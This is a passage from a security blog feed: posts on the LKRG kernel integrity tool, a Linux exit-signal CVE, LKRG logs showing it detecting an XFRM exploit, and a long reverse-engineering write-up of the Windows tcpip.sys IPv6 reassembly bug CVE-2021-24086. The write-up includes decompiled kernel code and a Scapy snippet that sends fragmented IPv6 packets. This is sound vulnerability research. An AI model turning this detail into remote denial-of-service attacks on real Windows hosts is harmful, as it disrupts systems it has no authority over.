Btw., among other things, we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more.

Best regards,
Adam

Effectiveness of Linux Rootkit Detection Tools

By: pi3
15 June 2020 at 03:40

I would like to draw attention to the following Openwall tweet:

Juho Junnila's Master's Thesis "Effectiveness of Linux Rootkit Detection Tools" shows our LKRG as by far the most effective kernel rootkit detector (of those tested), even though that wasn't our primary focus: https://t.co/pz0r502dK6 h/t @Adam_pi3

— Openwall (@Openwall) June 14, 2020

and the full post on LKRG’s mailing list here:

https://www.openwall.com/lists/lkrg-users/2020/06/14/5

Thanks,
Adam

CVE-2020-12826

By: pi3
15 May 2020 at 00:21

CVE-2020-12826 was assigned to track the Linux kernel problem which I described in my previous post.

CVE MITRE described the problem pretty accurately:

A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.
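As a toy illustration of the 32-bit wrap-around at the heart of that description (numbers made up):

MASK = 0xFFFFFFFF  # exec_id was declared as a 32-bit integer before the fix

parent_exec_id_seen_by_child = 5            # recorded at fork() time
parent_self_exec_id = (5 + 2**32) & MASK    # parent exec()'d 2^32 times since

# The do_notify_parent() protection effectively compares these counters;
# after the overflow they match again, so the check can be bypassed.
print(parent_exec_id_seen_by_child == parent_self_exec_id)  # True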

RedHat tracks this issue here:

https://bugzilla.redhat.com/show_bug.cgi?id=1822077

Debian here:

https://security-tracker.debian.org/tracker/CVE-2020-12826

Fix can be found here:

https://github.com/torvalds/linux/commit/7395ea4e65c2a00d23185a3f63ad315756ba9cef

Interestingly, the story of insufficiently restricted exit signals might not be over 😉

How did this pass review and get backported to stable kernels? https://t.co/WhBrqUZhrw (Hint: case of right hand not knowing what the left is doing, involving a recent security fix)

— grsecurity (@grsecurity) May 14, 2020

In short, the following patch reintroduces the same problem:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5f2006144c6ae941726037120fa1001ddede784

Best regards,
Adam

Linux kernel bug – all kernels insufficiently restrict exit signals

By: pi3
26 March 2020 at 00:09

I’ve recently spent some time looking at the ‘exec_id’ counter. Historically, the Linux kernel had 2 independent security problems related to that code: CVE-2009-1337 and CVE-2012-0056.

Until 2012, the ‘self_exec_id’ field (among others) was used to enforce permission checks for the /proc/pid/{mem/maps/…} interface. However, it was done poorly, and a serious security problem was reported, known as “Mempodipper” (CVE-2012-0056). Since that patch, ‘self_exec_id’ is not tracked there anymore, and the kernel instead looks at the process’ VM at the time of the open().

In 2009, Oleg Nesterov discovered that the Linux kernel had incorrect logic for resetting ->exit_signal. As a result, a malicious user could bypass it by exec’ing a setuid application before exiting (->exit_signal won’t be reset to SIGCHLD). CVE-2009-1337 was assigned to track this issue.

The logic responsible for handling ->exit_signal has been changed a few times, and the current logic has been locked down since Linux kernel 3.3.5. However, it is not fully robust, and it is still possible for a malicious user to bypass it. Basically, it is possible to send arbitrary signals to a privileged (suid root) parent process.

I’ve summarized my analysis and posted on LKML:
https://lists.openwall.net/linux-kernel/2020/03/24/1803

and kernel-hardening mailing list:
https://www.openwall.com/lists/kernel-hardening/2020/03/25/1

Btw. Kernels 2.0.39 and 2.0.40 look secure 😉

Thanks,
Adam

Linux kernel XFRM UAF

By: pi3
21 March 2020 at 01:27

On the 28th of February, I sent a short summary to the lkrg-users mailing list (https://www.openwall.com/lists/lkrg-users/2020/02/28/1) regarding the recent Linux kernel XFRM UAF exploit dropped by Vitaly Nikolenko. I believe it is worth reading, so I've decided to reference it on my blog as well:

Hey,

Vitaly Nikolenko published an exploit for a Linux kernel XFRM use-after-free. His tweet with more details can be found here:

centos 8 / rhel 8 / ubuntu 14.04, 16.04, 18.04 poc is uploaded https://t.co/b3IJoxMaHI. The tech report is public too https://t.co/UHsMYScN9Y pic.twitter.com/uDpjEm0ycX

— Vitaly Nikolenko (@vnik5287) February 28, 2020

Detailed description of the bug can be found here:

https://duasynt.com/pub/vnik/01-0311-2018.pdf

I’ve tested his exploit under the latest version of LKRG (from the repo) and it correctly detects and kills it:

[Fri Feb 28 10:04:24 2020] [p_lkrg] Loading LKRG…
[Fri Feb 28 10:04:24 2020] Freezing user space processes … (elapsed 0.008 seconds) done.
[Fri Feb 28 10:04:24 2020] OOM killer disabled.
[Fri Feb 28 10:04:24 2020] [p_lkrg] Verifying 21 potential UMH paths for whitelisting…
[Fri Feb 28 10:04:24 2020] [p_lkrg] 6 UMH paths were whitelisted…
[Fri Feb 28 10:04:25 2020] [p_lkrg] [kretprobe] register_kretprobe() for  failed! [err=-22]
[Fri Feb 28 10:04:25 2020] [p_lkrg] ERROR: Can't hook ovl_create_or_link function :(
[Fri Feb 28 10:04:25 2020] [p_lkrg] LKRG initialized successfully!
[Fri Feb 28 10:04:25 2020] OOM killer enabled.
[Fri Feb 28 10:04:25 2020] Restarting tasks … done.
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  Trying to kill process[lucky0 | 67342]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!

The latest LKRG detects the user_namespace corruption, which in a way proves that our namespace escape logic works. When I ran the same test with the LKRG code base reverted to the commit just before namespace corruption detection was introduced, LKRG still detected the exploit via the standard method:

[Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] Trying to kill process[lucky0 | 17599]!

[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] Trying to kill process[lucky0 | 22293]!

This is an interesting case. Vitaly published just a compiled binary of his exploit (not the source code). This means that adapting his exploit to play a cat-and-mouse game with LKRG is not an easy task. It is possible to reverse-engineer and modify the exploit binary; however, it's more work.

Thanks,

Adam

Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On Tuesday the 13th of October 2020, Microsoft released a patch for CVE-2020-16898, a vulnerability affecting Windows' tcpip.sys kernel-mode driver, dubbed Bad Neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement
packets.

The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Not having diffed Microsoft patches in years, I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it, as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start; oh well :)

That is why, when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys, I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086, but somehow the internet stayed silent long enough for me to complete this task, which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD: from diffing the patches, to reverse-engineering tcpip.sys, to fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough; it is available on my github: 0vercl0k/CVE-2021-24086.

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.
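
To make the truncation concrete, here is a tiny Python model of the arithmetic (the value is chosen to mirror the WinDbg session later in the post):

def u16(x):
    '''Model of the uint16_t(HeaderAndOptionsLength) truncation.'''
    return x & 0xFFFF

HeaderAndOptionsLength = 0x10010
print(hex(u16(HeaderAndOptionsLength)))  # 0x10: what NetioRetreatNetBuffer sees
# The NdisGetDataBuffer failure condition described below:
assert u16(HeaderAndOptionsLength) != HeaderAndOptionsLength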

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated, which allows an attacker to trigger a special condition in NdisGetDataBuffer and make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL, and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugcheck looks like:

[image: triggering the bugcheck]
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists

For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I decided to also write up mine; I'll try to cover aspects that are covered less, or not at all, in his post, like tcpip.sys internals for example.

All right, let's start at the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

  • There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
  • Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
  • One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet, we also learn that those flaws were found internally by Microsoft's own @piazzt, which is awesome.

Googling around also reveals a bunch more useful information, as it seems that Microsoft privately shared PoCs with their partners via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-24086) as a first step. I figured it might be easier to trigger, and that I might be able to use the knowledge acquired while triggering it to better understand tcpip.sys and maybe work on the other ones if time and motivation allowed.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches; probably around the Windows XP / Windows 7 era. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog, which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what that means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

[image: BinDiff results for tcpip.sys]

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

[image: the new basic block in BinDiff]

It ends with what looks like a comparison against the integer 0xffff and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles, as they are usually technically inaccurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet, right?

Reverse-engineering tcpip.sys

This is where the real journey starts, along with the usual emotional rollercoaster that comes with studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, was I wrong.

Baby steps

The first thing I did was to prepare a lab environment. I installed a Windows 10 VM (target) and a Linux VM (attacker), set up KDNet kernel debugging for the target, installed Wireshark / Scapy (v2.4.4), and created a virtual switch that the two VMs share. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sight - no big surprise there; it implements Windows' IPv4 & IPv6 network stack after all. I started the adventure by focusing on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

[image: the patched basic block in IDA]

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly, I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')

This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff802`2edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
 # Call Site
00 tcpip!Ipv6pReassembleDatagram
01 tcpip!Ipv6pReceiveFragment
02 tcpip!Ipv6pReceiveFragmentList
03 tcpip!IppReceiveHeaderBatch
04 tcpip!IppFlcReceivePacketsCore
05 tcpip!IpFlcReceivePackets
06 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
07 tcpip!FlReceiveNetBufferListChainCalloutRoutine
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx
0a tcpip!FlReceiveNetBufferListChain

We can even observe the fragmented packets in Wireshark which is also pretty cool:

[image: the fragmented packets in Wireshark]

For those that are not familiar with packet fragmentation, it is a mechanism used to chop packets larger than the Maximum Transmission Unit (MTU) into smaller chunks that can be sent across network equipment. The receiving network stack has the burden of stitching them all back together in a safe manner (winkwink).

All right, perfect. We now have what I consider a good enough research environment, and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works: the type of arguments it receives, recovering structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up and top-down approaches. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer that seems to be related to something that got received, and we want to set it to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though; time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed at the semantics of some of them, but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from, but maybe we don't need to know that much. One of the first questions you might ask yourself is: how does the kernel store network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
   +0x000 Next             : Ptr64 _NET_BUFFER
   +0x008 CurrentMdl       : Ptr64 _MDL
   +0x010 CurrentMdlOffset : Uint4B
   +0x018 DataLength       : Uint4B
   +0x018 stDataLength     : Uint8B
   +0x020 MdlChain         : Ptr64 _MDL
   +0x028 DataOffset       : Uint4B
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferHeader  : _NET_BUFFER_HEADER
   +0x030 ChecksumBias     : Uint2B
   +0x032 Reserved         : Uint2B
   +0x038 NdisPoolHandle   : Ptr64 Void
   +0x040 NdisReserved     : [2] Ptr64 Void
   +0x050 ProtocolReserved : [6] Ptr64 Void
   +0x080 MiniportReserved : [4] Ptr64 Void
   +0x0a0 DataPhysicalAddress : _LARGE_INTEGER
   +0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
   +0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST

It can look overwhelming, but we don't need to understand every detail. What is important is that the network data is stored in a regular MDL. Like MDLs, NET_BUFFERs can be chained together, which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For readers not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory into a contiguous virtual memory region. Every MDL is followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map into a contiguous virtual memory region; magic.

kd> dt nt!_MDL
   +0x000 Next             : Ptr64 _MDL
   +0x008 Size             : Int2B
   +0x00a MdlFlags         : Int2B
   +0x00c AllocationProcessorNumber : Uint2B
   +0x00e Reserved         : Uint2B
   +0x010 Process          : Ptr64 _EPROCESS
   +0x018 MappedSystemVa   : Ptr64 Void
   +0x020 StartVa          : Ptr64 Void
   +0x028 ByteCount        : Uint4B
   +0x02c ByteOffset       : Uint4B

A NET_BUFFER_LIST is basically a structure that keeps track of a list of NET_BUFFERs, as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
   +0x000 Next             : Ptr64 _NET_BUFFER_LIST
   +0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferListHeader : _NET_BUFFER_LIST_HEADER
   +0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
   +0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
   +0x020 NdisPoolHandle   : Ptr64 Void
   +0x030 NdisReserved     : [2] Ptr64 Void
   +0x040 ProtocolReserved : [4] Ptr64 Void
   +0x060 MiniportReserved : [2] Ptr64 Void
   +0x070 Scratch          : Ptr64 Void
   +0x078 SourceHandle     : Ptr64 Void
   +0x080 NblFlags         : Uint4B
   +0x084 ChildRefCount    : Int4B
   +0x088 Flags            : Uint4B
   +0x08c Status           : Int4B
   +0x08c NdisReserved2    : Uint4B
   +0x090 NetBufferListInfo : [29] Ptr64 Void

Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.
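
Before moving on, here is a toy Python model of those indirections (purely conceptual; the field names mirror the WinDbg dumps above, but this is not the real kernel layout):

# Toy model of the indirections that !ndiskd.nbl walks for us:
# NBL -> chain of NBs -> chain of MDLs.
class Mdl:
    def __init__(self, byte_count, nxt = None):
        self.ByteCount, self.Next = byte_count, nxt

class NetBuffer:
    def __init__(self, mdl_chain):
        self.MdlChain = mdl_chain

def nb_backing_bytes(nb):
    '''Sum the bytes backing one NET_BUFFER by walking its MDL chain.'''
    total, mdl = 0, nb.MdlChain
    while mdl is not None:
        total += mdl.ByteCount
        mdl = mdl.Next
    return total

# One NET_BUFFER backed by two non-contiguous chunks of physical memory:
nb = NetBuffer(Mdl(0x1000, Mdl(0x28)))
assert nb_backing_bytes(nb) == 0x1028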

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works. I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they chain together: layer N tells you what you'll find at layer N+1.
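
To make the chained-headers idea concrete, here is a minimal Python walk over an IPv6 extension-header chain (a sketch assuming well-formed input; real parsing must validate every length against the buffer, which is rather the point of this post):

# hop-by-hop, routing, fragment, destination options
EXTENSION_HEADERS = {0, 43, 44, 60}

def walk_headers(buf):
    next_header = buf[6]  # next_header byte of the fixed 40-byte IPv6 header
    offset = 40
    while next_header in EXTENSION_HEADERS:
        yield next_header, offset
        if next_header == 44:
            ext_len = 8  # the fragment header is always 8 bytes
        else:
            # hdr_ext_len counts 8-byte units, excluding the first 8 bytes
            ext_len = (buf[offset + 1] + 1) * 8
        next_header = buf[offset]
        offset += ext_len
    # first non-extension header: the upper-layer protocol (e.g. 17 = UDP)
    yield next_header, offset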

What I am about to describe is what I figured out while reverse-engineering, as well as what I observed while debugging it through a bazillion experiments. Full disclosure: I am no expert, so take it with a grain of salt :)

The top-level function of interest is IppReceiveHeaderBatch. The first thing it does is invoke IppReceiveHeadersHelper on every packet in the list:

if ( Packet )
{
    do
    {
        Next = Packet->Next;
        Packet->Next = 0;
        IppReceiveHeadersHelper(Packet, Protocol, ...);
        Packet = Next;
    }
    while ( Next );
}

Packet_t is an undocumented structure associated with received packets. A bunch of state is stored in this structure, and figuring out the semantics of the important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions read and update it during parsing.

NetBufferList = Packet->NetBufferList;
HeaderSize = Protocol->HeaderSize;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
    // ...
}
else
{
    Packet->NextHeader = IpHdr->next_header;
    Packet->NextHeaderPosition = offsetof(ipv6_header_t, next_header);
    SrcAddrOffset = offsetof(ipv6_header_t, src);
}

The function does a lot more; it initializes several Packet_t fields, but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns to IppReceiveHeaderBatch, it extracts a demuxer from the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (the term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};

NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

[image: indexing the demuxer array in IDA]

If the demuxer handles an extension header, a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header, at which point it moves on to the next packet.

while ( ... )
{
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
        Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
        Demuxer = &Protocol->Demuxers[IpProto];
    }
    if ( !Demuxer->IsExtensionHeader )
        Demuxer = 0;
    if ( Demuxer )
        Demuxer->Parse(RcvList);
    else
        RcvList = RcvList->Next;
}

Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

[image: the header-parsing loop in IDA]

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come in handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 43 -> Ipv6pReceiveRoutingHeader
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions

A demuxer can expose a callback routine for parsing, which I called Parse. The Parse method receives a Packet and is free to update its state; for example, to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

[image: Ipv6pReceiveFragmentList in IDA]

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

The most important fields for us are :

  • offset, which tells the start offset of where the data that follows this header should be placed in the reassembled packet,
  • the m bit, which specifies whether or not this is the last fragment.

Note that the offset field is a count of 8-byte blocks; if you set it to 1, your data will land at +8 bytes in the reassembled packet; set it to 2 and it lands at +16 bytes, etc.

